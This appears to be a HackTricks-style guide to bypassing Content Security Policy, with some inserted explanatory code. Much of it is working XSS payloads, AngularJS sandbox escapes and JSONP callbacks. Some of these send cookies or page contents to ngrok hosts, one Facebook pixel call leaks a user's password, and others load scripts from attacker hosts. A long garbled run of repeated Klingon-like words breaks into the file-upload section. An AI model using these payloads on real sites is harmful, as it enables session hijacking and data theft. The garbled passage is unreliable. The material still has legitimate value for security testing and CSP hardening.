Content Security Policy (CSP) Bypass
What is CSP
Content Security Policy (CSP) is a browser technology primarily aimed at shielding against attacks such as cross-site scripting (XSS). It works by defining the paths and sources from which the browser may load resources, including images, frames, and JavaScript. For instance, a policy might permit loading and executing resources from the same domain ('self'), including inline resources and the execution of string code through functions like eval, setTimeout, or setInterval.
Implementation of CSP is conducted through response headers or by incorporating meta elements into the HTML page. Following this policy, browsers proactively enforce these stipulations and immediately block any detected violations.
- Implemented via response header:
Content-Security-Policy: default-src 'self'; img-src 'self' allowed-website.com; style-src 'self';
- Implemented via meta tag:
<meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src https://*; child-src 'none';">
Headers
CSP can be enforced or monitored using these headers:
- Content-Security-Policy: Enforces the CSP; the browser blocks any violations.
- Content-Security-Policy-Report-Only: Used for monitoring; reports violations without blocking them. Ideal for testing in pre-production environments.
Defining Resources
CSP restricts the origins for loading both active and passive content, controlling aspects like inline JavaScript execution and the use of eval(). An example policy is:
default-src 'none';
img-src 'self';
script-src 'self' https://code.jquery.com;
style-src 'self';
report-uri /cspreport;
font-src 'self' https://addons.cdn.mozilla.net;
frame-src 'self' https://ic.paypal.com https://paypal.com;
media-src https://videos.cdn.mozilla.net;
object-src 'none';
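As an added example (not code from the HackTricks page): a parser and a triage function for the JSON document a browser POSTs to the report-uri endpoint (/cspreport in the policy above) whenever an enforced or Report-Only policy is violated. The csp-report field names are the ones browsers send in this format; the function names, the allowedHosts parameter and the two sample reports are constructed for this example.

```javascript
// Added example, not code from the HackTricks page. Parses the report-uri
// JSON body ({"csp-report": {...}}) and classifies it so a defender can
// separate XSS attempts from policy typos and browser-extension noise.

function parseCspReport(body) {
  const outer = typeof body === 'string' ? JSON.parse(body) : body;
  const r = outer && outer['csp-report'];
  if (!r || typeof r !== 'object') {
    throw new Error('body is not a csp-report document');
  }
  // effective-directive names the directive actually applied (script-src even
  // when only default-src was set); older browsers send only violated-directive,
  // whose first token is the directive name.
  const violated = String(r['violated-directive'] || '');
  return {
    documentUri: String(r['document-uri'] || ''),
    directive: String(r['effective-directive'] || violated.split(/\s+/)[0] || ''),
    blockedUri: String(r['blocked-uri'] || ''),
    sourceFile: String(r['source-file'] || ''),
    lineNumber: Number(r['line-number'] || 0),
    // "report" when the violation came from a Report-Only policy, "enforce" otherwise.
    disposition: String(r['disposition'] || 'enforce'),
    scriptSample: String(r['script-sample'] || ''),
  };
}

// Browser extensions inject content into pages and trip CSP constantly; those
// reports are noise for the application team.
const EXTENSION_SCHEMES = ['chrome-extension:', 'moz-extension:', 'safari-extension:', 'safari-web-extension:'];

// Classify one parsed report. allowedHosts (assumed parameter) lists the hosts
// the policy is meant to permit, so a blocked URL on one of them points at a
// policy typo rather than at injected content.
function triageReport(report, allowedHosts) {
  const fromExtension = (s) => EXTENSION_SCHEMES.some((p) => s.startsWith(p));
  if (fromExtension(report.blockedUri) || fromExtension(report.sourceFile)) {
    return 'noise-extension';
  }
  if (report.directive !== 'script-src') {
    return 'other-directive';
  }
  // Blocked inline scripts/handlers are reported as "inline", blocked string
  // evaluation as "eval"; on a page that ships no inline script these are the
  // first sign of reflected or stored XSS attempts.
  if (report.blockedUri === 'inline' || report.blockedUri === 'eval') {
    return 'blocked-inline';
  }
  // data:/blob:/javascript: script sources are reported as the bare scheme.
  if (/^(data|blob|javascript)(:|$)/.test(report.blockedUri)) {
    return 'blocked-scheme';
  }
  try {
    const host = new URL(report.blockedUri).host;
    return allowedHosts.includes(host) ? 'policy-misconfiguration' : 'blocked-external';
  } catch (_) {
    return 'unparseable-uri';
  }
}

// Triage a batch of report bodies (e.g. everything the /cspreport handler
// received in the last hour) and count each class.
function summarize(bodies, allowedHosts) {
  const counts = {};
  for (const body of bodies) {
    const cls = triageReport(parseCspReport(body), allowedHosts);
    counts[cls] = (counts[cls] || 0) + 1;
  }
  return counts;
}

// Constructed sample reports, not real traffic.
const SAMPLE_EXTERNAL = JSON.stringify({
  'csp-report': {
    'document-uri': 'https://app.example/profile',
    'violated-directive': "script-src 'self' https://code.jquery.com",
    'effective-directive': 'script-src',
    'original-policy': "default-src 'none'; script-src 'self' https://code.jquery.com; report-uri /cspreport",
    'disposition': 'enforce',
    'blocked-uri': 'https://third-party.example/x.js',
    'status-code': 200,
  },
});

const SAMPLE_INLINE_REPORT_ONLY = JSON.stringify({
  'csp-report': {
    'document-uri': 'https://app.example/search?q=test',
    'violated-directive': "script-src 'self'",
    'effective-directive': 'script-src',
    'original-policy': "script-src 'self'; report-uri /cspreport",
    'disposition': 'report',
    'blocked-uri': 'inline',
    'line-number': 42,
    'script-sample': 'alert(document.domain)',
  },
});

console.log(summarize([SAMPLE_EXTERNAL, SAMPLE_INLINE_REPORT_ONLY], ['app.example', 'code.jquery.com']));
```

The disposition field is what distinguishes a Report-Only rollout from an enforced policy in the same log stream; a burst of blocked-inline reports with a script-sample during a Report-Only trial is exactly the signal the monitoring header exists to surface before the policy is enforced.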
Directives
- script-src: Allows specific sources for JavaScript, including URLs, inline scripts, and scripts triggered by event handlers or XSLT stylesheets.
- default-src: Sets a default policy for fetching resources when specific fetch directives are absent.
- child-src: Specifies allowed resources for web workers and embedded frame contents.
- connect-src: Restricts URLs which can be loaded using interfaces like fetch, WebSocket, XMLHttpRequest.
- frame-src: Restricts URLs for frames.
- frame-ancestors: Specifies which sources can embed the current page, applicable to elements like <frame>, <iframe>, <object>, <embed>, and <applet>.
- img-src: Defines allowed sources for images.
- font-src: Specifies valid sources for fonts loaded using @font-face.
- manifest-src: Defines allowed sources of application manifest files.
- media-src: Defines allowed sources for loading media objects.
- object-src: Defines allowed sources for <object>, <embed>, and <applet> elements.
- base-uri: Specifies allowed URLs for loading using <base> elements.
- form-action: Lists valid endpoints for form submissions.
- plugin-types: Restricts mime types that a page may invoke.
- upgrade-insecure-requests: Instructs browsers to rewrite HTTP URLs to HTTPS.
- sandbox: Applies restrictions similar to the sandbox attribute of an <iframe>.
- report-to: Specifies a group to which a report will be sent if the policy is violated.
- worker-src: Specifies valid sources for Worker, SharedWorker, or ServiceWorker scripts.
- prefetch-src: Specifies valid sources for resources that will be fetched or prefetched.
- navigate-to: Restricts the URLs to which a document can navigate by any means (a, form, window.location, window.open, etc.)
Sources
- *: Allows all URLs except those with data:, blob:, filesystem: schemes.
- 'self': Allows loading from the same domain.
- 'data': Allows resources to be loaded via the data scheme (e.g., Base64 encoded images).
- 'none': Blocks loading from any source.
- 'unsafe-eval': Allows the use of eval() and similar methods, not recommended for security reasons.
- 'unsafe-hashes': Enables specific inline event handlers.
- 'unsafe-inline': Allows the use of inline resources like inline <script> or <style>, not recommended for security reasons.
- 'nonce': A whitelist for specific inline scripts using a cryptographic nonce (number used once).
- 'sha256-<hash>': Whitelists scripts with a specific sha256 hash.
- 'strict-dynamic': Allows loading scripts from any source if it has been whitelisted by a nonce or hash.
- 'host': Specifies a specific host, like example.com.
- https: Restricts URLs to those that use HTTPS.
- blob: Allows resources to be loaded from Blob URLs (e.g., Blob URLs created via JavaScript).
- filesystem: Allows resources to be loaded from the filesystem.
- 'report-sample': Includes a sample of the violating code in the violation report (useful for debugging).
- 'strict-origin': Similar to 'self' but ensures the protocol security level of the sources matches the document (only secure origins can load resources from secure origins).
- 'strict-origin-when-cross-origin': Sends full URLs when making same-origin requests but only sends the origin when the request is cross-origin.
- 'unsafe-allow-redirects': Allows resources to be loaded that will immediately redirect to another resource. Not recommended as it weakens security.
Unsafe CSP Rules
'unsafe-inline'
Content-Security-Policy: script-src https://google.com 'unsafe-inline';
self + 'unsafe-inline' via Iframes
{% content-ref url="csp-bypass-self-+-unsafe-inline-with-iframes.md" %} csp-bypass-self-+-unsafe-inline-with-iframes.md {% endcontent-ref %}
'unsafe-eval'
Content-Security-Policy: script-src https://google.com 'unsafe-eval';
Working payload:
<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>
strict-dynamic
If an allowed script creates a new script tag in the DOM, the new script is also allowed to execute, because an already-trusted script created it.
Wildcard (*)
Content-Security-Policy: script-src 'self' https://google.com https: data *;
"/>'><script src=https://attacker-website.com/evil.js></script>
"/>'><script src=data:text/javascript,alert(1337)></script>
Missing object-src and default-src
Content-Security-Policy: script-src 'self' ;
Working payloads:
<img src=x onerror=alert(1)>
<script>alert(1)</script>
<svg onload=alert(1)>
<iframe src=javascript:alert(1)>
<video src=javascript:alert(1)>
<audio src=javascript:alert(1)>
<body onload=alert(1)>
<object data=javascript:alert(1)>
<embed src=javascript:alert(1)>
<a href=javascript:alert(1)>Click me</a>
<img src=x onerror=confirm(1)>
<script>confirm(1)</script>
<svg onload=confirm(1)>
<iframe src=javascript:confirm(1)>
<video src=javascript:confirm(1)>
<audio src=javascript:confirm(1)>
<body onload=confirm(1)>
<object data=javascript:confirm(1)>
<embed src=javascript:confirm(1)>
<a href=javascript:confirm(1)>Click me</a>
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
">'><object type="application/x-shockwave-flash" data='https: //ajax.googleapis.com/ajax/libs/yui/2.8.0 r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e) {alert(1337)}//'>
<param name="AllowScriptAccess" value="always"></object>
File Upload + 'self'
Content-Security-Policy: script-src 'self'; object-src 'none' ;
Description
The Content Security Policy (CSP) is a security mechanism that helps protect websites against cross-site scripting (XSS) attacks. It lets website owners specify which sources of content the browser is allowed to load. One common directive is the 'self' keyword, which restricts content to the same origin as the website.
However, in some cases this directive can be bypassed to allow file uploads from external sources, by exploiting misconfigurations or vulnerabilities in the website's implementation of CSP.
Exploitation
To bypass the 'self' directive in CSP and enable file uploads from external sources, you can try the following techniques:
- Subdomain takeover: If the website has a subdomain that is not properly configured, you can take over the subdomain and host your own content there. When the website loads content from that subdomain, it actually loads the content you control.
- CDN bypass: If the website uses a Content Delivery Network (CDN) to serve its content, you can try to bypass the CSP by uploading your files to the CDN and referencing them in your payload. When the website loads the content from the CDN, the CSP allows it.
- CORS misconfiguration: If the website has Cross-Origin Resource Sharing (CORS) misconfigurations, you can exploit them to bypass the CSP. By making a cross-origin request to a server you control, you can include the file you want to upload in the request and have it stored on your server.
Mitigation
To prevent file uploads from external sources bypassing the 'self' directive in CSP, website owners should:
- Ensure that all subdomains are properly configured and not vulnerable to takeover.
- Implement proper security measures for their CDN to prevent unauthorized file uploads.
- Configure CORS properly to prevent misconfigurations that can be exploited.
By following these mitigations, website owners can strengthen their CSP implementation and protect against file uploads from external sources.
'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhut
"/>'><script src="/uploads/picture.png.js"></script>
However, it is highly probable that the server validates the uploaded file and only allows certain file types.
Moreover, even if you manage to upload JS code inside a file with an extension the server accepts (like script.png), this will not be enough: servers like Apache select the MIME type of the file from its extension, and browsers like Chrome refuse to execute JavaScript served with a MIME type that says it is an image. "Hopefully", there are mistakes. For example, from a CTF I learnt that Apache doesn't know the .wave extension, therefore it doesn't serve it with a MIME type like audio/*.
From here, if you find an XSS and a file upload, and you manage to find a misinterpreted extension, you could try to upload a file with that extension and the content of the script. Or, if the server is checking the correct format of the uploaded file, create a polyglot (some polyglot examples here).
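The MIME rules the paragraphs above rely on, as an added example that is not code from the original page: a check that, given the Content-Type a server answers for a candidate upload, decides whether the browser would run it from a script tag, following the Fetch standard's blocking rules for script destinations (image/*, audio/*, video/* and text/csv are never executed; with X-Content-Type-Options: nosniff only a JavaScript MIME type runs). The SAMPLE_RESPONSES map is constructed; its Content-Type values are what a stock Apache mime.types mapping typically yields and are assumptions to verify against the real target.

```javascript
// Added example, not code from the original page: decide whether a browser
// would execute an uploaded file as <script src> from the Content-Type the
// server returns. Implements the Fetch standard's two blocking rules for
// script destinations:
//   1. image/*, audio/*, video/* and text/csv responses are never executed;
//   2. with X-Content-Type-Options: nosniff, only a JavaScript MIME type runs,
//      and a missing Content-Type counts as "not JavaScript".
// Without nosniff, a missing or unrelated Content-Type (text/plain,
// application/octet-stream, no header at all) still executes.

const JS_MIME_TYPES = new Set([
  "application/ecmascript", "application/javascript", "application/x-ecmascript",
  "application/x-javascript", "text/ecmascript", "text/javascript",
  "text/javascript1.0", "text/javascript1.1", "text/javascript1.2",
  "text/javascript1.3", "text/javascript1.4", "text/javascript1.5",
  "text/jscript", "text/livescript", "text/x-ecmascript", "text/x-javascript",
]);

// "type/subtype" in lower case, or null when the header is absent or unparsable.
function mimeEssence(contentType) {
  if (contentType === null || contentType === undefined) return null;
  const essence = contentType.split(";")[0].trim().toLowerCase();
  return essence.includes("/") ? essence : null;
}

// True when a script-like request for a response with this Content-Type would run.
function scriptWouldExecute(contentType, nosniff = false) {
  const essence = mimeEssence(contentType);
  if (nosniff) {
    return essence !== null && JS_MIME_TYPES.has(essence);
  }
  if (essence === null) return true; // no usable header: the browser still runs it
  if (essence.startsWith("image/") || essence.startsWith("audio/") ||
      essence.startsWith("video/") || essence === "text/csv") {
    return false; // blocked outright for script destinations
  }
  return true; // text/plain, application/octet-stream, ...: runs (with a console warning)
}

// Constructed sample (assumed values; check the real target with curl -I):
// candidate filenames and the Content-Type an Apache server with the stock
// mime.types mapping typically answers for them.
const SAMPLE_RESPONSES = {
  "picture.png": "image/png",
  "picture.png.js": "application/javascript", // Apache types by the last extension
  "sound.wav": "audio/x-wav",
  "sound.wave": null, // extension unknown to Apache: no Content-Type header at all
  "notes.txt": "text/plain",
};

// Which of the candidate uploads a script tag under script-src 'self' would run.
function usableUploads(responses, nosniff = false) {
  return Object.entries(responses)
    .filter(([, contentType]) => scriptWouldExecute(contentType, nosniff))
    .map(([name]) => name);
}
```

Running usableUploads(SAMPLE_RESPONSES) lists picture.png.js, sound.wave and notes.txt; with nosniff set on the responses only picture.png.js survives, which is why checking for X-Content-Type-Options on the upload directory is the first thing to do before hunting for odd extensions.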
Third Party Endpoints + ('unsafe-eval')
{% hint style="warning" %}
For some of the following payloads, unsafe-eval is not even needed.
{% endhint %}
```
Content-Security-Policy: script-src https://cdnjs.cloudflare.com 'unsafe-eval';
```
Load a vulnerable version of Angular and execute arbitrary JS:
```xml
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script>
<div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1);//');}} </div>
```
```html
"><script src="https://cdnjs.cloudflare.com/angular.min.js"></script> <div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div>
```
```html
"><script src="https://cdnjs.cloudflare.com/angularjs/1.1.3/angular.min.js"> </script>
<div ng-app ng-csp id=p ng-click=$event.view.alert(1337)>
```
With some bypasses from: https://blog.huli.tw/2022/08/29/en/intigriti-0822-xss-author-writeup/
```html
<script/src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js></script>
<iframe/ng-app/ng-csp/srcdoc="
<script/src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.8.0/angular.js>
</script>
<img/ng-app/ng-csp/src/ng-o{{}}n-error=$event.target.ownerDocument.defaultView.alert($event.target.ownerDocument.domain)>"
>
```
Payloads using Angular + a library with functions that return the window object (check out this post):
{% hint style="info" %}
The post shows that you could load all libraries from cdnjs.cloudflare.com (or any other allowed JS libraries repo), execute all the functions each library adds, and check which functions from which libraries return the window object.
{% endhint %}
```html
<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.8/angular.js" /></script>
<div ng-app ng-csp>
{{$on.curry.call().alert(1)}}
{{[].empty.call().alert([].empty.call().document.domain)}}
{{ x = $on.curry.call().eval("fetch('http://localhost/index.php').then(d => {})") }}
</div>
```
```html
<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js"></script>
<div ng-app ng-csp>
{{$on.curry.call().alert('xss')}}
</div>
```
```html
<script src="https://cdnjs.cloudflare.com/ajax/libs/mootools/1.6.0/mootools-core.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js"></script>
<div ng-app ng-csp>
{{[].erase.call().alert('xss')}}
</div>
```
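The scan the hint above describes, as an added example that is neither the linked post's code nor part of the original page: walk a library's namespace (or the built-in prototypes it extends), call every function with no receiver, and report the ones that hand back the global object, because a sloppy-mode function that returns this is exactly the gadget the $on.curry.call() and [].erase.call() payloads use to reach window from inside the AngularJS sandbox. fakeLibrary is a constructed stand-in named after those gadgets; its function bodies are assumptions, not the real prototype.js or MooTools code. In a real page you would load the libraries from the allowed CDN and pass e.g. Function.prototype and Array.prototype.

```javascript
// Added example, not from the linked post or the original page: find
// library functions that return the global object when called without a
// receiver. Function is used to build the stand-ins so they are sloppy-mode
// (and therefore see `this` as the global object) even if this file runs
// under strict mode.
const fakeLibrary = {
  // Shaped like Function.prototype.curry: no arguments -> returns `this`.
  curry: new Function("if (!arguments.length) return this; return null;"),
  // Shaped like an Array.prototype helper that returns `this` unconditionally.
  empty: new Function("return this;"),
  // Harmless helpers: return something that is not the global object, or throw.
  trim: new Function("s", "return String(s).trim();"),
  noop: new Function("return undefined;"),
  throws: new Function("throw new TypeError('needs a receiver');"),
};

// Scan one object (a namespace or a prototype) and return, sorted, the names
// of the functions that yield the global object when invoked as fn.call().
function findWindowGadgets(target, globalObject = globalThis) {
  const gadgets = [];
  for (const name of Object.getOwnPropertyNames(target)) {
    let descriptor;
    try {
      descriptor = Object.getOwnPropertyDescriptor(target, name);
    } catch {
      continue; // exotic objects may refuse introspection; skip them
    }
    const fn = descriptor && descriptor.value; // accessors (caller, arguments) are skipped
    if (typeof fn !== "function") continue;
    try {
      if (fn.call() === globalObject) gadgets.push(name);
    } catch {
      // Most library functions throw without a receiver; that is not a gadget.
    }
  }
  return gadgets.sort();
}

// Scan several libraries (name -> the objects they extend) and report the
// gadgets per library, the "library, function" pairs the post lists.
function scanLibraries(libraries, globalObject = globalThis) {
  const report = {};
  for (const [libName, targets] of Object.entries(libraries)) {
    const found = targets.flatMap((target) => findWindowGadgets(target, globalObject));
    if (found.length) report[libName] = [...new Set(found)].sort();
  }
  return report;
}
```

scanLibraries({ "fake-lib": [fakeLibrary] }) reports curry and empty; in a browser, after loading the candidate libraries from the whitelisted CDN, scanLibraries({ prototype: [Function.prototype, Array.prototype, String.prototype] }) gives you the names to try in an Angular expression such as {{[].NAME.call().alert(1)}}.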
Abusing google recaptcha JS code
According to this CTF writeup, if https://www.google.com/recaptcha/ is allowed in a CSP, it can be abused to execute arbitrary JS and bypass the CSP:
```html
<div
ng-controller="CarouselController as c"
ng-init="c.init()"
>
[[c.element.ownerDocument.defaultView.parent.location="http://google.com?"+c.element.ownerDocument.cookie]]
<div carousel><div slides></div></div>
<script src="https://www.google.com/recaptcha/about/js/main.min.js"></script>
```
Third Party Endpoints + JSONP
```
Content-Security-Policy: script-src 'self' https://www.google.com https://www.youtube.com; object-src 'none';
```
Scenarios like this, where script-src is set to 'self' plus a particular whitelisted domain, can be bypassed using JSONP. A JSONP endpoint on the whitelisted domain reflects its callback parameter into a response that the browser executes as a script from that trusted origin, so if the callback is not restricted to a plain function name, the attacker controls JavaScript that runs in the page. Working payloads:
```html
"><script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script>
"><script src="/api/jsonp?callback=(function(){window.top.location.href=`http://f6a81b32f7f7.ngrok.io/cooookie`%2bdocument.cookie;})();//"></script>
```
```html
https://www.youtube.com/oembed?callback=alert;
<script src="https://www.youtube.com/oembed?url=http://www.youtube.com/watch?v=bDOYN-6gdRE&format=json&callback=fetch(`/profile`).then(function f1(r){return r.text()}).then(function f2(txt){location.href=`https://b520-49-245-33-142.ngrok.io?`+btoa(txt)})"></script>
```
JSONBee contains ready-to-use JSONP endpoints for CSP bypasses on different websites.
The same vulnerability occurs if the trusted endpoint contains an Open Redirect: once the initial endpoint is trusted, its redirects are trusted too. Strictly speaking, the browser still matches the redirect target against the hosts in the source list, but path restrictions are ignored after a redirect, so an open redirect on a whitelisted host lets you reach any path (for example a JSONP endpoint) on any whitelisted host.
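Why those callbacks work, as an added example that is not code from the original page: a JSONP endpoint that reflects the callback parameter verbatim next to one that restricts it to a dotted identifier, plus the black-box probe an attacker uses to tell them apart. The endpoint code and the probe values are constructed for illustration.

```javascript
// Added example, not code from the original page: a JSONP endpoint reflects
// the callback parameter into a response that the browser executes as script
// from the endpoint's (whitelisted) origin. Reflected verbatim, the parameter
// is a script injection point; restricting it to an identifier closes that,
// but see the note after the block.

// Vulnerable: copies the callback as-is, so callback=alert(1);// turns the
// response into  alert(1);//({"ok":true});  and the JSON becomes a comment,
// which is why the payloads above end in //.
function buildJsonpVulnerable(callback, data) {
  return `${callback}(${JSON.stringify(data)});`;
}

// A plain or dotted identifier: handleResponse, app.cb_1, jQuery123.
const SAFE_CALLBACK = /^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/;

function isSafeCallback(callback) {
  return SAFE_CALLBACK.test(callback);
}

// Hardened: rejects anything that is not an identifier before reflecting it.
function buildJsonpHardened(callback, data) {
  if (!isSafeCallback(callback)) {
    throw new Error("invalid JSONP callback");
  }
  return `${callback}(${JSON.stringify(data)});`;
}

// Black-box probe from the attacker side: send a callback that is not a valid
// identifier and check whether the body starts with it unchanged. True means
// the endpoint will execute whatever expression you put in the parameter.
function callbackReflectedVerbatim(sentCallback, responseBody) {
  return responseBody.startsWith(sentCallback + "(");
}

// Constructed probe values: the first has the shape of the payloads above,
// the second is what a well-behaved client sends.
const PROBE_EXPRESSION = "alert(document.domain);//";
const PROBE_IDENTIFIER = "handleResponse";
```

Note that the hardened builder still accepts callback=alert, which is exactly the first payload above: an identifier-only filter stops arbitrary expressions, but an attacker can still call any global function with the JSON object as its argument. From the point of view of the site that whitelists the host, the only robust fix is not to trust a host that serves JSONP at all, for instance by moving script-src to nonces or hashes.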
Third Party Abuses
As described in the following post, many third-party domains that might be allowed somewhere in the CSP can be abused either to exfiltrate data or to execute JavaScript code. Some of these third parties are:
Entity | Allowed Domain | Capabilities |
---|---|---|
Facebook | www.facebook.com, *.facebook.com | Exfil |
Hotjar | *.hotjar.com, ask.hotjar.io | Exfil |
Jsdelivr | *.jsdelivr.com, cdn.jsdelivr.net | Exec |
Amazon CloudFront | *.cloudfront.net | Exfil, Exec |
Amazon AWS | *.amazonaws.com | Exfil, Exec |
Azure Websites | *.azurewebsites.net, *.azurestaticapps.net | Exfil, Exec |
Salesforce Heroku | *.herokuapp.com | Exfil, Exec |
Google Firebase | *.firebaseapp.com | Exfil, Exec |
If you find any of these allowed domains in the CSP of your target, you may be able to bypass the CSP by registering on the third-party service and either exfiltrating data to it or executing code from it.
For example, if you find either of the following CSPs:
```
Content-Security-Policy: default-src 'self' www.facebook.com;
```
```
Content-Security-Policy: connect-src www.facebook.com;
```
You should be able to exfiltrate data, in the same way it has been done with Google Analytics/Google Tag Manager (see https://www.humansecurity.com/tech-engineering-blog/exfiltrating-users-private-data-using-google-analytics-to-bypass-csp and https://blog.deteact.com/csp-bypass/). With a Facebook Developer account, create a Facebook app and note its App ID; the Facebook SDK gadget fbq can then be used from the target page to send a custom event carrying the data you want to exfiltrate, and the event shows up in the Events Manager of your app. Run the following in the target page:
fbq('init', '1279785999289471'); // this number should be the App ID of the attacker's Meta/Facebook account
fbq('trackCustom', 'My-Custom-Event',{
data: "Leaked user password: '"+document.getElementById('user-password').innerText+"'"
});
Bypass via RPO (Relative Path Overwrite)
RPO (Relative Path Overwrite) is another technique to bypass path restrictions that works on some servers. For example, if the CSP allows the path https://example.com/scripts/react/, it can be bypassed like this:
<script src="https://example.com/scripts/react/..%2fangular%2fangular.js"></script>
The browser will ultimately load https://example.com/scripts/angular/angular.js.
This works because for the browser, you are loading a file named ..%2fangular%2fangular.js located under https://example.com/scripts/react/, which is compliant with CSP. However, some servers decode %2f, effectively requesting https://example.com/scripts/react/../angular/angular.js, which is equivalent to https://example.com/scripts/angular/angular.js.
By exploiting this inconsistency in URL interpretation between the browser and the server, the path rules can be bypassed.
The solution is to not treat %2f as / on the server side, ensuring a consistent interpretation between the browser and the server.
Online Example: https://jsbin.com/werevijewa/edit?html,output
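The following Python walkthrough is an added example (not code from HackTricks or the online demo) showing the interpretation gap the RPO section describes: the browser keeps %2f as an escaped byte and the CSP path check passes, while a server that percent-decodes before normalising resolves the request outside the allowed directory. The constant values, the lax_server_path and strict_server_segments helpers and the rpo_gap summary are assumptions made for the demo; the strict variant shows the fix the section recommends (never let a decoded %2f act as a path separator).

```python
import posixpath
from urllib.parse import urljoin, unquote, urlsplit

# Constructed values for the walkthrough (assumption: the page's CSP allows
# exactly this path prefix, as in the text above).
ALLOWED_PREFIX = "https://example.com/scripts/react/"
INJECTED_SRC = "..%2fangular%2fangular.js"


def browser_view(base: str, src: str) -> str:
    """URL the browser builds for <script src=...> and checks against the CSP.
    %2f stays an escaped byte, so the reference is one segment under base."""
    return urljoin(base, src)


def csp_path_allows(url: str, allowed_prefix: str) -> bool:
    """Simplified CSP path matching: a source path ending in '/' is a prefix match."""
    return url.startswith(allowed_prefix)


def lax_server_path(url: str) -> str:
    """Server that percent-decodes the whole path BEFORE normalising it (the bug):
    the decoded '/' becomes a separator and '..' climbs out of the allowed directory."""
    return posixpath.normpath(unquote(urlsplit(url).path))


def strict_server_segments(url: str) -> list:
    """Server that splits the raw path on literal '/' first and decodes each
    segment afterwards: an encoded slash can never act as a separator."""
    segments = []
    for seg in urlsplit(url).path.split("/"):
        if seg == "..":
            if segments:
                segments.pop()
        elif seg not in ("", "."):
            segments.append(unquote(seg))
    return segments


def rpo_gap(base: str, src: str, allowed_prefix: str) -> dict:
    """Summarise how the browser, a lax server and a strict server see the same request."""
    url = browser_view(base, src)
    origin = "{0.scheme}://{0.netloc}".format(urlsplit(url))
    lax = lax_server_path(url)
    return {
        "browser_url": url,
        "csp_allows": csp_path_allows(url, allowed_prefix),
        "lax_server_file": lax,
        "lax_file_inside_allowed_path": csp_path_allows(origin + lax, allowed_prefix),
        "strict_server_segments": strict_server_segments(url),
    }


if __name__ == "__main__":
    for key, value in rpo_gap(ALLOWED_PREFIX, INJECTED_SRC, ALLOWED_PREFIX).items():
        print(f"{key}: {value}")
```

The strict server ends up with a single file name "../angular/angular.js" inside scripts/react/, which does not exist, so the injected reference fails instead of escaping the allowed path.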
Iframes JS execution
{% content-ref url="../xss-cross-site-scripting/iframes-in-xss-and-csp.md" %} iframes-in-xss-and-csp.md {% endcontent-ref %}
missing base-uri
If the base-uri directive is missing you can abuse it to perform a dangling markup injection.
Moreover, if the page is loading a script using a relative path (like <script src="/js/app.js">) with a nonce, you can abuse the base tag to make it load the script from your own server, achieving XSS.
If the vulnerable page is loaded over HTTPS, use an HTTPS URL in the base tag.
<base href="https://www.attacker.com/">
AngularJS events
Content Security Policy (CSP) may restrict JavaScript event handlers. However, AngularJS introduces custom events as an alternative. Within an event, AngularJS provides a unique object $event, referencing the native browser event object. This $event object can be exploited to circumvent the CSP. Notably, in Chrome, the $event/event object possesses a path attribute holding an array of the objects in the event's propagation chain, with the window object always at the end. This structure is what makes the sandbox escape possible.
By passing this array to the orderBy filter, it's possible to iterate over it and use the last element (the window object) to trigger a global function like alert(). The code snippet below shows this process:
<input%20id=x%20ng-focus=$event.path|orderBy:%27(z=alert)(document.cookie)%27>#x
?search=<input id=x ng-focus=$event.path|orderBy:'(z=alert)(document.cookie)'>#x
The snippet uses the ng-focus directive to trigger the event, pipes $event.path through the orderBy filter to iterate over the path array, and uses the window object at its end to call alert() and reveal document.cookie.
More AngularJS payloads can be found in https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
AngularJS and whitelisted domain
Content-Security-Policy: script-src 'self' ajax.googleapis.com; object-src 'none' ;report-uri /Report-parsing-url;
CSP Bypass using Callback Functions and Vulnerable Classes
A CSP policy that whitelists domains for script loading in an Angular JS application can be bypassed through the invocation of callback functions and certain vulnerable classes. Further information on this technique can be found in a detailed guide available on this git repository.
Working payloads:
<script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script>
ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>
<!-- no longer working -->
<script src="https://www.googleapis.com/customsearch/v1?callback=alert(1)">
Other JSONP endpoints that allow arbitrary execution can be found here.
Bypass via Redirection
When a script load is redirected server-side, the CSP only checks the scheme, host and port of the redirect target and ignores its path (CSP spec, "Paths and Redirects"), so a redirect can bypass path restrictions. Here is an example:
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Security-Policy" content="script-src http://localhost:5555 https://www.google.com/a/b/c/d">
</head>
<body>
<div id=userContent>
<script src="https://www.google.com/test"></script>
<script src="https://www.google.com/a/test"></script>
<script src="http://localhost:5555/301"></script>
</div>
</body>
</html>
